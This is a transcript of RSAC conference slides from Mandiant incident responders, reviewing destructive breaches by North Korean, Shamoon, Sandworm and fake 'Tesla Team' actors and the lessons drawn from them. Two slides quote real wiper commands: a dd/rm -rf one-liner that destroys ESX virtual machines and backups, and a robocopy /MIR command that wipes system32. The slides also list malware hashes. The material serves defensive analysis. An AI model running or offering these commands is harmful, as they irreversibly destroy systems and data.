lessons learned from investigating disruptive data breaches · #rsac session id: vivek chudgar....
TRANSCRIPT
#RSAC
SESSION ID:SESSION ID:
Vivek Chudgar
Lessons Learned from Investigating Disruptive Data Breaches
FLE-F01
Senior DirectorMandiant@VChudgar
Bart InglotPrincipal ConsultantMandiant@BartInglot
#RSAC
Agenda
2
Perception of Destructive Breaches
War StoriesDestructive North KoreaTroubles in the Persian GulfRussia vs UkraineFalse Flag Attack
Lessons Learned
#RSAC
Myth-Busting
“IT’S FASCINATING, BUT IT DOESN’T CONCERN ME”
3
#RSAC
Myth-Busting “Breaches Don’t Happen in All Verticals”
4
TOTAL INDUSTRIES INVESTIGATED
#RSAC
Myth-Busting “Breaches Don’t Happen in Asia Pacific”
5
#RSAC
Myth-Busting “No Disruptive Breaches in Asia Pacific”
6
• Ransomware attacks wreak havoc on IT systems around the world
• Notably WannaCry (May 2017) and NotPetya (June 2017)
• Very creative – worm, reuse of cached credentials, WMI and PsExec, bootkit, supply chain attack, etc.
• Was it targeted?
Image by bleepstatic.com
#RSAC
Myth-Busting “Formatting infected systems does the job”
7
Phishing Campaigns
Compromised HostsCorporate Network
#RSAC
Myth-Busting “Formatting infected systems does the job”
8
Phishing Campaigns
Compromised Hosts
? ? ?
Corporate Network
Accessed Hosts
#RSAC
Myth-Busting “Formatting infected systems does the job”
9
Unique Malware
B:5 / A:229Stolen Passwords
B:0 / A:51Infected Systems
B:3 / A:154Attacker CnC
B:12 / A:98
• The statistics before and after the enterprise-wide investigation
#RSAC
Myth-Busting “Formatting infected systems does the job”
10
• The attackers were present in the environment for 7 years
• Multiple attacker groups with possibly different missions
• The initial infection vector was unknown, gigabytes left the network
• Public and custom tools• Backdoors: ZXShell, Gh0stRAT, Metasploit, Zegost, GRILLMARK, etc.
• Web shells: China Chopper, JspSpy, jFolder, etc.
• Key loggers, email miners, credential dumpers, tunnelers, etc.
• Compromised VPN credentials
#RSAC
Myth-Busting “Formatting infected systems does the job”
11
• Unable to perform the routine work for few months
• Several planned IT and transformational projects put on hold
• Service impact – e.g. MSSP’s access was restricted
• Overall, disruptions to “the Business as Usual”
#RSAC
Disruptive Data Breaches
DESTRUCTION / EXTORTION / RANSOM / PWNAGE
12
#RSAC
Disruptive Data Breaches
DESTRUCTION / EXTORTION / RANSOM / PWNAGE
13
Destructive
#RSAC
North Korea Background
14
• Students chosen from top universities in DPRK• Well paid in US dollars, free access to the Internet, and have the opportunity
to travel outside of DPRK
• Known for causing disruptive attacks• DDoS, website defacement, Master Boot Record (MBR) wiping, and publishing
stolen data
• Attacks against victims are targeted and deliberate• Major attacks against organizations in Asia and North America• Ongoing attacks against South Korean media and financial services
organizations since 2009
#RSAC
North Korea Destructive Operations
• Multiple variants of malware designed to wipe Windows systems
• Malware was manually deployed by the attackers, but designed to automatically spread
• Malware operated differently depending on the type of system:1. Workstation – stopped antivirus and wrote a custom MBR to the disk
2. Server – disabled Terminal Services
3. Mail Server – stopped the mail service and disabled terminal services.
4. Domain Controllers – disabled terminal services and executed the wiper code after a period of time to allow the malware to continue spreading.
15
#RSAC
North Korea Destructive Operations (continued)
• Created script to wipe virtual machines on ESX servers
• The company’s backups were also erased
find / -type f -name “*.*” | grep -v “disks” | grep -v “\/dev” | awk‘{print “ls -l \”” $0 “\”” }’ |sh | awk ‘{if ($5>524288000) print “ddif=/dev/zero of=\”” $9 “\” bs=512k count=400 seek=400conv=notrunc,noerror > /dev/null 2>&1 &”}’ | sh
sleep 1 rm -r -f /boot/* & rm -r -f /vmfs/* & rm -r -f /* & rm -f /bin/* /sbin/* &exit
16
#RSAC
North Korea Lessons learned
17
• The level of access obtained by DPRK threat actors is no different than what’s obtained by China and Russia-based threat actors
• DPRK motivations are very different
• Ensure the backup environment is segmented from corporate network
#RSAC
Troubles in the Persian GulfMore MBR Wiping Malware
18
Image by naukriingulf.com
#RSAC
Shamoon Background
• 2012 – Widely publicised attack on Oil & Gas company in Middle East
• Designed to corrupt files and overwrite the MBR
• Nov 2016 – Recent resurgence targeting Gulf Cooperation Council (GCC) states
• Jan 2017 – Another wave of Shamoon attacks in GCC States
19
#RSAC
Shamoon November 2016
• The identified malware exhibits destructive behavior on Windows based operating systems
• The malware still uses a signed RawDisk driver from EldoS
File Name Path PE Compile Time MD5 File Size
ntssrvr64.exe %SYSTEMROOT%\System32 2009-02-15 12:32:19 8fbe990c2d493f58a2afa2b746e49c86 717,312
ntssrvr32.exe %SYSTEMROOT%\System32 N/A N/A 1,349,632
ntssrvr32.bat %SYSTEMROOT%\System32 N/A 10de241bb7028788a8f278e27a4e335f 160
gpget.exe %SYSTEMROOT%\System32 2009-02-15 12:30:41 c843046e54b755ec63ccb09d0a689674 327,680
drdisk.sys %SYSTEMROOT%\System32 2011-12-28 16:51:29 76c643ab29d497317085e5db8c799960 31,632
key8854321.pub %SYSTEMROOT%\System32 N/A b5d2a4d8ba015f3e89ade820c5840639 782
netinit.exe %SYSTEMROOT%\System32 N/A b9bc61194bfb520c551817904a945840 183,808
netimm173.pnf %SYSTEMROOT%\INF N/A 93b885adfe0da089cdf634904fd59f71 Varies
20
#RSAC
Shamoon Lessons Learned
• Old-tricks can work even years after – the RawDisk driver
• Do not upload to VirusTotal if you suspect a targeted attack• Hard-coded credentials• Information specific to your business• Tip-off the attackers
#RSAC
Russia vs UkraineThe Sandworm Team and War
22
#RSAC
Sandworm Team Background
• Destructive malware impacting Ukrainian Financial Sector (Dec 2016)
• Spearphishing lures w/ a Ministry of Finance theme
• The lure docs similar to prior campaigns that targeted Borispyl Airport, the Ukrainian Media, and the disrupted Ukrainian utilities.
23
#RSAC
Sandworm Team Destructive Operations
• At least one document was previously used as a Sandworm Team lure.
• Filename: • Додаток №2.xls
• MD5:• b75c869561e014f4d384773427c879a6
24
#RSAC
• The campaign from Dec 2016 leveraged STRAYKEY backdoor
• STRAYKEY uses Telegram API for CnC
• Capabilities:• Running remote commands• Uploading and exfiltrating files• Downloading additional files
Sandworm Team Destructive Operations
25
#RSAC
Sandworm Team Destructive Operations
• Deployed WHITEROSE – destructive malware, a variant of "KillDisk”
• Ukrainian Government financial agencies affected • Mr. Robot Themed• Two samples recovered:
ffb1e8babaecc4a8cb3d763412294469b75c869561e014f4d384773427c879a6
26
#RSAC
False Flag AttackExtortion by the Fake Telsa Team
27
Image by studyabroad.com
#RSAC
Fake Tesla Team Background
• Relatively unsophisticated threat, but very disruptive and destructive
• Compromised multiple natural resources and casino organizations in Canada
• Earliest known hacking activity dates back to 2013
28
#RSAC
Fake Tesla Team Background
• Stole several gigabytes of sensitive data and published it on the Internet (The Pirate Bay, Pastebin.com, Photobucket.com, Justpaste.it, and others)
• Created scheduled tasks to destroy production systems across the enterprise
• Victims endured system outages for multiple days as they recovered data from backups
• Extorted victims to pay ransoms between $50K and $500K (BTC)
29
#RSAC
Fake Tesla Team False Flags
• The real Tesla Team is believed to be a Serbian hacking group known for DDoS and defacement
• They are unlikely to be targeting Canadian organizations
• The threat actor previously claimed to be a Russian hacking group – “Angels of Truth”
• Likely use of Google Translate to write in Russian• Claimed to be both “Anonymous Threat Agent” and
“Tesla Team” with one victim
30
#RSAC
Fake Tesla Team Tool, Tactics, Procedures (TTPs)
• Leveraged publicly available tools like Metasploit and SplinterRAT
• PowerShell used to load simple stagers that connect to CnC
• Custom malware has not been observed
• Multi-year campaigns – observed in one environment for nearly 1.5 years
• Leveraged single factor VPN solutions for remote access
31
#RSAC
Fake Tesla Team Tool, Tactics, Procedures (TTPs)
• Backdoors and VPN solution accessed over TOR or compromised IPs
• Known to engage journalists to advertise certain breaches
• Simple, yet effective technique to wipe systems:
mkdir "C:\emptydir"robocopy "C:\emptydir" "C:\windows\system32" /MIR | shutdown /s /t 1800
32
#RSAC
Fake Tesla Team Lessons Learned
33
• If you don’t pay, your data will likely be dumped
• They exaggerate their technical skills and ability to access environments
• Partial payments may be able to buy time
Understand that paying the extortion may be the right option in some scenarios, but there are no guarantees the attackers won’t come back for
more money or simply leak the data anyway.
#RSAC
Lessons Learned
Responding to disruptive breaches is challenging, and not easy to plan for given the dynamic nature of these attacks and the attackers.
34
Image by fourseasons.com
#RSAC
35
Apply - Lessons Learned (1)
1. Engage experts before a breach (forensic, legal, public relations)
2. Confirm there actually is a breach
3. Establish if you are dealing with a human adversary
4. Remember that timing is critical
5. Keep focused on the incident
6. Consider all options when asked to pay ransom/extortion
7. Think of the ways your network could be accessed
#RSAC
36
Apply - Lessons Learned (2)
8. Ensure strong segmentation and control over backups
Schrödinger’s Backup
The condition of any backup is unknown until a restore is attempted
Image by fatcat.ninja
#RSAC
37
Apply - Lessons Learned (3)
9. After the incident has been handled, immediately focus on broader security improvements
10. If you kick them out, they will return
For additional information, see Mandiant M-Trends 2017 Report:
https://www.fireeye.com/current-threats/annual-threat-report/mtrends.html